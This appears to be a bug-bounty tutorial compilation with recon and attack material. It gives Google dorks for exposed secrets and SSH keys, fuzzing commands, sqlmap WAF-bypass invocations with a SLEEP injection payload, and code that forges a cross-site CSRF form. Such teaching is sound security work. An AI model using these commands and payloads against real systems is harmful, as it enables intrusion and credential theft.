ExploitQuest
6.85K subscribers
Top 25 JavaScript file paths that are often used to store sensitive information in web applications:

01. /js/config.js
02. /js/credentials.js
03. /js/secrets.js
04. /js/keys.js
05. /js/password.js
06. /js/api_keys.js
07. /js/auth_tokens.js
08. /js/access_tokens.js
09. /js/sessions.js…

(the remaining file names appear in the dork below)
Dork (finds open directory listings that expose those file names; add site:target.com so the results stay inside your authorized scope):

intitle:"index of" inurl:"/js/" ("config.js" | "credentials.js" | "secrets.js" | "keys.js" | "password.js" | "api_keys.js" | "auth_tokens.js" | "access_tokens.js" | "sessions.js" | "authorization.js" | "encryption.js" | "certificates.js" | "ssl_keys.js" | "passphrases.js" | "policies.js" | "permissions.js" | "privileges.js" | "hashes.js" | "salts.js" | "nonces.js" | "signatures.js" | "digests.js" | "tokens.js" | "cookies.js" | "topsecr3tdonotlook.js")
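Once one of those files is in hand, the question is what inside it is actually a secret. The scanner below is an added example (not code from the channel) that runs three checks over a JavaScript source: a known key format (the AWS access key ID prefix AKIA), assignments to variables whose names suggest a credential, and long quoted strings with high Shannon entropy. The sample JS at the bottom is constructed for the demo; the AWS key in it is the documented AWS example value, not a live key.

```python
"""Look for secrets in a JavaScript file: known key formats, credential-looking
assignments and high-entropy string literals. Added example; the regexes are a
starting point, not a complete rule set, and SAMPLE_JS is constructed."""
import math
import re
from collections import Counter
from typing import List, Tuple

AWS_ACCESS_KEY = re.compile(r"\bAKIA[0-9A-Z]{16}\b")
CREDENTIAL_ASSIGNMENT = re.compile(
    r"""(?i)\b(?P<name>(?:api[_-]?key|secret|token|passw(?:or)?d|auth)\w*)\s*[:=]\s*["'](?P<value>[^"']{6,})["']"""
)
QUOTED_BLOB = re.compile(r"""["'](?P<value>[A-Za-z0-9+/=_\-]{20,})["']""")


def shannon_entropy(s: str) -> float:
    """Bits per character; random keys sit well above prose or identifiers."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def scan_js(source: str, entropy_threshold: float = 4.0) -> List[Tuple[int, str, str]]:
    """Return (line number, finding kind, value) for every suspicious literal."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for m in AWS_ACCESS_KEY.finditer(line):
            findings.append((lineno, "aws_access_key_id", m.group(0)))
        for m in CREDENTIAL_ASSIGNMENT.finditer(line):
            findings.append((lineno, "credential_assignment", m.group("value")))
        for m in QUOTED_BLOB.finditer(line):
            value = m.group("value")
            # Value-based check: catches secrets whose variable name gives nothing away.
            if shannon_entropy(value) >= entropy_threshold:
                findings.append((lineno, "high_entropy_string", value))
    return findings


# Constructed sample; the AKIA value is AWS's own documentation example key.
SAMPLE_JS = """\
// constructed sample, not taken from any real site
const API_URL = "https://api.example.com/v1";
const AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE";
const apiKey = "sk-live-do-not-ship-me";
var password = "hunter2";
window.__cfg = "0123456789abcdefghijklmnopqrstuv";
const theme = "dark";
"""

if __name__ == "__main__":
    for lineno, kind, value in scan_js(SAMPLE_JS):
        print(f"line {lineno}: {kind}: {value}")
```

The entropy threshold of 4.0 bits per character is a tuning knob: the AWS example key scores about 3.7 and is found only by its format, while a 32-character random-looking value scores 5.0. Run the scanner over every file the dork turns up, then verify each hit by hand before reporting it.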
- Are you ready, kids?
- Yes, !
- I can't hear you!
- Yes sir, !

- Whooo... who is burning out in front of the screen?
- BUG-HUNTER!
- A top hacker in hookah smoke?
- BUG-HUNTER!
- Who breaks the scope always and everywhere?
- BUG-HUNTER!
- Do you like to party in trendy merch?
- BUG-HUNTER!
- Skilled and dexterous, not a fan of discussions?
- BUG-HUNTER!
- Looking for crits without any illusions?
- BUG-HUNTER!
- Who writes a full report to the vendor?
- BUG-HUNTER!
- Sparing no effort during the nights of the narpolet?
- BUG-HUNTER!
- Who wants the maximum bounty payouts?
- BUG-HUNTER!
- All thanks to your brilliant ingenuity?
- BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TER! BUG-HUN-TEEEER!
ffuf -u http://target.com/FUZZ -w wordlist.txt -e .json,.xml,.bak,.sql,.zip,.log,.config,.env -c -t 50 -recursion -recursion-depth 2 -s -mc 200,301,302 -o results.json
What does the command do?

It requests every word in wordlist.txt under the target, also with each of the listed extensions appended (-e), recurses two levels into the directories it finds (-recursion -recursion-depth 2), keeps only responses with status 200, 301 or 302 (-mc) and writes the hits to results.json (-o). -s silences the progress output, -c colours it and -t 50 runs 50 concurrent requests. In security testing it is used to find exposed or forgotten files on a server: backups, configuration files, .env files, logs and database dumps.


dirsearch -l urls.txt -e conf,config,bak,backup,swp,old,db,sql,asp,aspx,aspx~,asp~,py,py~,rb,rb~,php,php~,bkp,cache,cgi,csv,html,inc,jar,js,json,jsp,jsp~,lock,log,rar,sql.gz,sql.zip,sql.tar.gz,sql~,swp~,tar,tar.bz2,tar.gz,txt,wadl,zip,xml --deep-recursive --force-recursive --exclude-sizes=0B --random-agent --full-url -o output.txt

(-l takes a file with one target URL per line; --exclude-sizes=0B drops empty responses; --random-agent rotates the User-Agent; --full-url prints complete URLs in the output.)
Brute-force directories and files:
a simple example with gobuster; ffuf, feroxbuster and other tools work the same way.

gobuster dir -u https://target.com -w wordlist.txt

• dir : directory scanning mode
• -u : target URL
• -w : path to the wordlist

Other useful parameters:
• -x : file extensions to append (e.g. php,html)
• -t : number of threads
• -c : cookie string sent with every request (for authenticated areas)
A simple CSRF check for endpoints that accept JSON data without an anti-CSRF token

Change the Content-Type from application/json to text/plain and see whether the server still accepts the request. A plain HTML form can only send the "simple" content types (application/x-www-form-urlencoded, multipart/form-data, text/plain) cross-site, and those are sent without a CORS preflight, so an endpoint that parses JSON regardless of Content-Type can be driven from an attacker's page.

Steps to check for the bypass

Identify the target request:

Find a state-changing endpoint that accepts a JSON body and relies on the JSON Content-Type instead of an anti-CSRF token.

Capture the request:

Use Burp Suite, Postman or the browser developer tools to capture the original request.

Original request (what the application sends; the Cookie header carries the session):

POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ...
Content-Type: application/json

{
  "email": "test@example.com"
}

Modified request (replayed with only the Content-Type changed):

POST /api/profile HTTP/2
Host: app.example.com
Cookie: sess=eyJ...
Content-Type: text/plain

{
  "email": "test@example.com"
}

Expected results:

If the server accepts the request:

The endpoint does not validate the Content-Type, and the change can be triggered cross-site with a form that uses enctype="text/plain".
Before reporting, confirm that the session cookie is actually attached to a cross-site POST (a cookie with SameSite=Lax or Strict is not; a SameSite=None cookie is) and that there is no other protection such as an Origin header comparison or a required custom header.

If the server rejects the request:

It validates the Content-Type, which closes this particular vector.
A proper anti-CSRF token or an Origin check is still the robust defence; Content-Type validation alone should not be the only line.
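The attack side of the check above, as an added example that is not part of the original post: a browser encodes an enctype="text/plain" form as one name=value line per field, so a single field whose name holds the front of the JSON and whose value holds the tail reassembles into a valid JSON body, with the mandatory "=" absorbed by a dummy string member. The two handlers show the vulnerable behaviour next to the hardened one. The endpoint URL is the one from the post; the attacker origin, field names and ALLOWED_ORIGINS are made up for the demo.

```python
"""text/plain CSRF against a JSON endpoint: forging the body and checking it.
Added example; the endpoint is the one from the post, everything else is assumed."""
import json
from html import escape

TARGET = "https://app.example.com/api/profile"   # endpoint from the post
ALLOWED_ORIGINS = {"https://app.example.com"}      # assumed for the hardened handler


def text_plain_form_body(fields):
    """What the browser sends for enctype="text/plain": 'name=value' + CRLF per field."""
    return "".join(f"{name}={value}\r\n" for name, value in fields)


def forge_json_form(target_url, payload):
    """Return (form fields, self-submitting HTML) whose text/plain body is valid JSON."""
    compact = json.dumps(payload, separators=(",", ":"))
    name = compact[:-1] + ',"pad":"'   # {"email":"...","pad":"   <- the '=' lands here
    value = '"}'                        # closes the dummy string and the object
    fields = [(name, value)]
    html = (
        f'<form id="f" action="{escape(target_url)}" method="POST" enctype="text/plain">'
        f'<input name="{escape(name)}" value="{escape(value)}">'
        '</form><script>document.getElementById("f").submit()</script>'
    )
    return fields, html


def vulnerable_handler(headers, body):
    """Parses JSON whatever the Content-Type says (the 'server accepts' case)."""
    try:
        return json.loads(body)
    except ValueError:
        return None


def hardened_handler(headers, body):
    """Require application/json and, when the browser sends Origin, an allowlisted origin."""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return None
    origin = headers.get("Origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return None
    try:
        return json.loads(body)
    except ValueError:
        return None


def demo():
    fields, html = forge_json_form(TARGET, {"email": "attacker@example.com"})
    body = text_plain_form_body(fields)
    # Headers a browser adds to a cross-site form POST (cookie only if SameSite allows it).
    cross_site = {"Content-Type": "text/plain", "Origin": "https://evil.example", "Cookie": "sess=..."}
    legit = {"Content-Type": "application/json", "Origin": "https://app.example.com"}
    return {
        "body": body,
        "html": html,
        "vulnerable_accepts": vulnerable_handler(cross_site, body),
        "hardened_rejects": hardened_handler(cross_site, body) is None,
        "hardened_accepts_legit": hardened_handler(legit, json.dumps({"email": "test@example.com"})),
    }


if __name__ == "__main__":
    result = demo()
    print(result["body"])
    print(result["vulnerable_accepts"], result["hardened_rejects"])
```

The forged body ends up as {"email":"attacker@example.com","pad":"="} followed by CRLF, which json.loads and most JSON parsers accept. Whether the forged request carries the victim's session depends on the cookie's SameSite attribute, which is why the check in the post should be paired with a look at the Set-Cookie flags.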
If you control a JSON request body (the original post referred to a screenshot that is not reproduced here), you can test it for blind SQL injection and then hand it to sqlmap. sqlmap recognises a JSON body passed through --data and offers to inject into each of its fields:

sqlmap -u 'https://target.com/' --data '{"User":"abcdefg","Pwd":"Abc@123"}' --random-agent --ignore-code=403 --dbs --hex

(--ignore-code=403 keeps the scan going when a WAF answers 403; --hex retrieves data hex-encoded, which survives filters that mangle quotes and special characters.)
One line to enumerate the subdomains of a target and list their favicon hashes.
The hash is the MurmurHash3 value Shodan indexes for favicons, so each one can be searched with http.favicon.hash:<value> to find every host serving the same icon, including ones the subdomain enumeration missed.

subfinder -d canva.com | httpx -favicon -j | jq -r .favicon | grep -v null | sort -u
WAF bypass for SQL injection (Cloudflare in this case)

command:

sqlmap -u "target.com" --dbs --batch --time-sec 10 --level 3 --hex --random-agent --tamper=space2comment,between

space2comment replaces spaces in the payload with /**/ and between rewrites > and = comparisons as BETWEEN clauses, so the request no longer matches signatures that key on those characters. --time-sec 10 raises the delay sqlmap uses to recognise a time-based response, which also makes the scan slower.

time-based blind payload (the + signs are URL-encoded spaces):

+AND+(SELECT+5140+FROM+(SELECT(SLEEP(10)))lfTO)
Here are 10 Google dorks that are useful for bug bounty hunters during reconnaissance (prefix each with site:target.com so the results stay inside your authorized scope):

1. Finding configuration or settings files

inurl:settings filetype:json OR filetype:xml

Purpose: locate configuration files that may contain keys or other sensitive settings.

2. Searching for backup files on servers

intitle:index.of "backup" OR "bkp" OR "bak"

Purpose: identify backup files exposed in public directory listings.

3. Discovering application error logs

inurl:error.log OR inurl:debug.log filetype:log

Purpose: find log files that may reveal internal paths, IP addresses or stack traces.

4. Locating database configuration files

inurl:dbconfig OR inurl:database filetype:ini OR filetype:env

Purpose: expose database settings or credentials.

5. Finding exposed API endpoints

inurl:api OR inurl:swagger filetype:json

Purpose: identify exposed APIs or Swagger/OpenAPI documentation.

6. Searching for private SSH keys

intitle:index.of id_rsa OR id_dsa filetype:key

Purpose: detect publicly accessible SSH private keys.

7. Exposing hardcoded passwords

intext:"password=" OR "pwd=" OR "pass=" filetype:properties OR filetype:txt

Purpose: find plaintext passwords in configuration or text files.

8. Finding confidential documents

site:example.com filetype:pdf OR filetype:xls "confidential"

Purpose: locate sensitive or confidential documents.

9. Detecting files with exported data

inurl:exports OR inurl:downloads filetype:csv OR filetype:txt

Purpose: discover exported user data or logs.

10. Identifying cloud configuration files

intext:"cloud" OR "aws" OR "gcp" filetype:yml OR filetype:yaml

Purpose: expose cloud service configurations such as AWS or GCP settings.
How do hackers find hidden pages on your site?
It's not magic, it's technique.

It's called web fuzzing.
Whether you are a developer, a pentester or just curious, you should know how effective this method is.

Here is a quick example with a well-known tool that administrators forget about too quickly: FFUF (Fuzz Faster U Fool).

🛠 Examples of use:

• Fuzzing with a custom header:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -H "Custom-Header: value"


• Recursive fuzzing to a given depth:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -recursion -recursion-depth 2


• Keeping only responses whose body matches a regular expression:

ffuf -w /path/to/wordlist.txt -u https://example.com/FUZZ -mr "regex-pattern"


Why does it work?
Because sites are like untidy houses: there is always a door left ajar.
Fuzzing takes a wordlist (common directory and file names, obvious combinations) and requests each one, exploring forgotten areas and turning up login pages, backups and other more or less sensitive resources.

But the real danger is not the tool.
It is a site that was built without anyone considering these attacks: anything reachable by URL without authentication is public, whether or not a link points to it.
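The ffuf, dirsearch and gobuster invocations on this page all implement the same loop; the following added example (written for this page, not taken from any of those tools) shows that loop in about sixty lines: expand the wordlist with extensions (-e / -x), request each candidate, keep the matching status codes (-mc), recurse into directories up to a depth (-recursion-depth), and calibrate against a nonsense path so that a server answering 200 to everything does not flood the results, which is what ffuf's -ac does. The HTTP layer is a callback, so the demo runs offline against a constructed in-memory site; target.example, the paths and the sizes are all made up.

```python
"""Offline model of directory/file fuzzing: wordlist x extensions, status-code
matching, recursion, soft-404 calibration. Added example; FAKE_SITE is constructed."""
from typing import Callable, Iterable, List, Tuple

Fetch = Callable[[str], Tuple[int, int]]          # url -> (status code, body length)
CALIBRATION_WORD = "zz-not-a-real-path-9f3e"       # arbitrary; ffuf -ac uses random names


def expand(words: Iterable[str], extensions: Iterable[str]) -> List[str]:
    """ffuf -e semantics: each word as-is, then word + ext for every extension."""
    out: List[str] = []
    for w in words:
        out.append(w)
        out.extend(w + ext for ext in extensions)
    return out


def fuzz(base_url: str, words: Iterable[str], fetch: Fetch, extensions=(),
         match_codes=(200, 301, 302), max_depth: int = 1) -> List[Tuple[str, int, int]]:
    """Breadth-first fuzz; returns (url, status, size) for every hit."""
    candidates = expand(words, extensions)
    # Calibration: if a nonsense path already "matches", the site answers soft 404s
    # and status codes alone are useless, so hits with that body size are dropped.
    calib_status, calib_size = fetch(f"{base_url}/{CALIBRATION_WORD}")
    soft404 = calib_status in match_codes
    hits: List[Tuple[str, int, int]] = []
    frontier = [(base_url, 0)]                    # (directory to fuzz, its depth)
    seen = set()
    while frontier:
        prefix, depth = frontier.pop(0)
        for cand in candidates:
            url = f"{prefix}/{cand}"
            if url in seen:
                continue
            seen.add(url)
            status, size = fetch(url)
            if status not in match_codes:
                continue
            if soft404 and size == calib_size:    # same body as a nonexistent path
                continue
            hits.append((url, status, size))
            # Simplification of ffuf's recursion: a redirect or an extension-less hit
            # is treated as a directory and fuzzed in turn, up to max_depth levels.
            if (status in (301, 302) or "." not in cand) and depth + 1 < max_depth:
                frontier.append((url, depth + 1))
    return hits


# Constructed fake site: path -> (status, size). No network involved.
BASE = "http://target.example"
FAKE_SITE = {
    "/admin": (301, 0),
    "/admin/config.bak": (200, 512),
    "/backup.zip": (200, 40960),
    "/js": (301, 0),
    "/js/config.js": (200, 300),
}


def fetch_normal(url: str) -> Tuple[int, int]:
    """Well-behaved server: unknown paths get a 404."""
    return FAKE_SITE.get(url[len(BASE):], (404, 1234))


def fetch_soft404(url: str) -> Tuple[int, int]:
    """Misconfigured server: unknown paths get 200 with the same 'not found' page."""
    return FAKE_SITE.get(url[len(BASE):], (200, 1234))


def demo():
    words = ["admin", "backup", "config", "js"]
    exts = [".zip", ".bak", ".js"]
    normal = fuzz(BASE, words, fetch_normal, exts, max_depth=2)
    soft = fuzz(BASE, words, fetch_soft404, exts, max_depth=2)
    return normal, soft


if __name__ == "__main__":
    for hit in demo()[0]:
        print(*hit)
```

Against the soft-404 server every one of the 16 top-level candidates comes back 200, yet the calibrated run reports the same five hits as the well-behaved server, because the "not found" body always has the same size. The flip side of size-based filtering is that a real file whose body happens to be that size is hidden too, which is why ffuf also offers -fw (word count) and -fl (line count) filters and why calibration should be repeated per directory on large sites.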